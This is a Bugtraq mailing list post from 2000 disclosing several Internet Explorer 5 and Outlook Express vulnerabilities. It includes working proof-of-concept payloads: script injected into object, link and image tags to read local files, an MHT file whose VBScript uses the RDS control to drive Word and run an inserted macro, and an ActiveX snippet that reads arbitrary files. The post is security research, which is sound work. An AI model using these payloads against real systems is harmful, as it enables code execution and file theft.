Bugtraq mailing list archives
CSS Exploits + RDS (IE5)
From: s.hird () STUDENT QUT EDU AU (Shane Hird)
Date: Sun, 12 Mar 2000 21:25:15 +1000
<Disclaimed> All these issues have been disclosed to MS, however no action has been taken so I assume they have decided not to patch the following problems. Small CSS Overview: Cross site scripting issues have been known for quite while now, in fact a long time before the recent CERT advisory about the matter, MS have had in place security measures for this ever since they started displaying custom local 404 error messages and others. taken directly from res://C:\WINDOWS\SYSTEM32\SHDOCLC.DLL/HTTP_404.HTM // Security precaution: must filter out "urlResult" and "displayresult" forbiddenChars = new RegExp("[<>\'\"]", "g"); // Global search/replace urlresult = urlresult.replace(forbiddenChars, ""); displayresult = displayresult.replace(forbiddenChars, ""); Obviously, because the page will be displaying remotely defined strings in the local zone, MS have filtered out 'dangerous' characters, which is fair enough. Without this security precaution, this page and others could easily be exploited. In fact, there are certain ones which are, which will be shown later, although they are a minor problem. MK/RES LFN CSS Bug: There are a few problems with the RES and MK and probably other protocols in that they dont recognise the temporary internet files as an internet zone when specified in short 8 char format. ie, the following will be opened in the 'local' zone whereas they would normally be opened in the 'Internet' zone if specified using LFN. "res://C:\Windows\Tempor~1\Content.IE5\XXXXXXX\dllfile.mid/htmlfile.htm" "mk:@MSITStore:C:\Windows\Tempor~1\Content.IE5\XXXXXXX\chmfile.chm::/htmfile .htm" This may not be much of an issue due to the fact that 'XXXXXXXX' is a random string and pretty much impossible to guess. However, outlook places TEMP files in the TEMP directory (not the temporary internet files directory) and places temp HTM files in the root of the Temporary Internet Files directory so it is easy to guess the location. And HTM files can be extracted and opened (in the 'local' zone) from the likes of MID files so can be exploited in a similar fashion to the Active Setup problem, although it would simply be a CSS exploit (which can be potentially serious, see later). The are various ways of exploiting this through outlook using various protocols and file formats etc, I wont list them here, but basically by not using a local temp directory and instead a random temp internet files directory it would solve most of the problems. Web Accessories CSS Bug: MS have released extensions to IE that allow viewing an image list, URL list and document tree among other things. These extensions are essentially just HTM files which parse the current HTM file and display results using script, which is shown in the local zone. Immediately one realises that this can be exploited if we can define the strings which are displayed, which we can. Each of the below lines will display a text file when one of the extensions is used on the current HTM file. This is a typical CSS bug, which can be exploited further with the use of RDS, see later. Document Tree Exploit: <OBJECT ID="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.docume nt.body.innerText);</SCRIPT>" CLASSID="CLSID:0"></OBJECT> URL List Exploit: <a href="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.docu ment.body.innerText);</SCRIPT>"></a> Image List Exploit: <IMG src="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.docum ent.body.innerText);</SCRIPT>"> MHT Temp File CSS Bug: A typical Temp file vulnerability. IE5 (or one of them) introduced the new 'Web Archive' format for storing web pages, which have the extension MHT. IE5 essentially takes each file which is needed for display of the page and encodes sequentially to a single MHT file in the format of a MIME message, 7bit and Base64 encoding and all, it even has a 'From:' field. (this by the way makes it difficult to send and recieve MHT attachments because outlook, or perhaps the mail server, converts it into MSG format, completely destroying the original file). When parsing the MHT file, IE extracts each file and places it into a single locked TMP file, however if the file referenced is in a frame or an IFRAME, the file is extracted and placed into its own unlocked file in the local temp directory, with guessable names, in fact, even definable names. An example exploit is included with the note about RDS. RDS ActiveX Control Bug: A new ActiveX control I think included with Visual Studio and probably IIS and other databasey type applications :). Anyway, when invoked in the local zone one can avoid the 'ActiveX' warning by creating business objects via DCOM using IP 127.0.0.1 instead of 'in-process' and from there take on pratically any action with permissions dependent on the current DCOM settings and current user. I believe this works on default configurations of any Win machine with RDS installed. This example fires up MS word and runs a custom macro, which from there you can take on any action at all. The example is included as part of the MHT exploit, which will extract a file to the temp directory and open it. Hopefully this won't get stuffed up by any 'smart' mail server. <------------------------ snip MHTExp.MHT ---------------------> From: <Saved by Microsoft Internet Explorer 5> Subject: MHT Exploit Date: Thu, 17 Feb 2000 19:31:45 +1000 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0000_01BF797D.A014BDD0" X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 This is a multi-part message in MIME format. ------=_NextPart_000_0000_01BF797D.A014BDD0 Content-Type: text/html; charset="Windows-1252" Content-Transfer-Encoding: 7bit Content-Location: MHTEXploit <html> <head> <title>MHT Exploit</title> </head> <frameset cols="*"> <frame name="local" src="file:Exploit.htm"> </frameset> </html> ------=_NextPart_000_0000_01BF797D.A014BDD0 Content-Type: text/html; charset="Windows-1252" Content-Transfer-Encoding: 7bit Content-Location: file:Exploit.htm <HTML> <script language="VBScript"><!-- if location.protocol <> "file:" then document.writeln("Exploiting MHT temp file vuln - Shane Hird") 'Note - Replace with required temp directory. window.open("file://C:\Documents and Settings\Shane\Local Settings\Temp\Exploit.htm") else msgbox("Running in local context") set rds = CreateObject("RDS.DataSpace") set busobj = rds.CreateObject("Word.Application", "127.0.0.1") busobj.visible = TRUE Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, "Public Sub Example()" NT.InsertLines 2, " MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")" NT.InsertLines 3, "End Sub" busobj.run "Normal.ThisDocument.Example" NT.DeleteLines 1, NT.CountOfLines set NT = Nothing busobj.quit window.close end if --></script> ------=_NextPart_000_0000_01BF797D.A014BDD0-- <---------------- snip MHTExp.mht -------------------> Outlook Express ActiveX Exploit: There is also this old exploit which apparently got fixed in IE5, but was never announced. It will allow reading of any file on the users machine, after the first newline of the file using an ActiveX provided by Outlook Express. <object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9" width="500" height="150"></object> <script language="Vbscript"><!-- msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird") MIME.src="C:\test.txt" msgbox("File Loaded") document.write("<P>File is displayed below</P><HR><PRE>") document.write(MIME.messagesource) --></script> End: I think thats all of them, excuse the mess, and the fact that they're all compiled into one message, but they're all kind of related and I didn't think they deserved they're own individual post. -Shane Hird s.hird () student qut edu au
Current thread:
- TESO advisory -- wmcdplay krahmer () CS UNI-POTSDAM DE (Mar 11)
- Our old friend Firewall-1 Chris Brenton (Mar 11)
- Re: Our old friend Firewall-1 Hugo.van.der.Kooij () CAIW NL (Mar 14)
- Re: Our old friend Firewall-1 Chris Brenton (Mar 15)
- TESO & C-Skills development advisory -- imwheel Sebastian (Mar 16)
- Re: TESO & C-Skills development advisory -- imwheel WHiTe VaMPiRe (Mar 19)
- Re: Our old friend Firewall-1 Hugo.van.der.Kooij () CAIW NL (Mar 14)
- Re: TESO advisory -- wmcdplay Kris Kennaway (Mar 11)
- CSS Exploits + RDS (IE5) Shane Hird (Mar 12)
- Advisory Update: ServerIron TCP/IP predictability fixed Andrew van der Stock (Mar 12)
- Exploit for Mandrake 6.1 (PAM/userhelper bug) Paulo Ribeiro (Mar 14)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Darron Froese (Mar 17)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Matt Davis (Mar 17)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Jeremy Gault (Mar 21)
- Oracle Web Listener 4.0.x Cerberus Security Team (Mar 14)
- Re: Advisory Update: ServerIron TCP/IP predictability fixed H D Moore (Mar 14)
- Re: Advisory Update: ServerIron TCP/IP predictability fixed Max Vision (Mar 16)
- FreeBSD Security Advisory: FreeBSD-SA-00:07.mh [REVISED] FreeBSD Security Officer (Mar 19)
- Bypassing IP filters in Bordermanager 3.5 Roy Sigurd Karlsbakk (Mar 15)
- Exploit for Mandrake 6.1 (PAM/userhelper bug) Paulo Ribeiro (Mar 14)
(Thread continues...)
- Our old friend Firewall-1 Chris Brenton (Mar 11)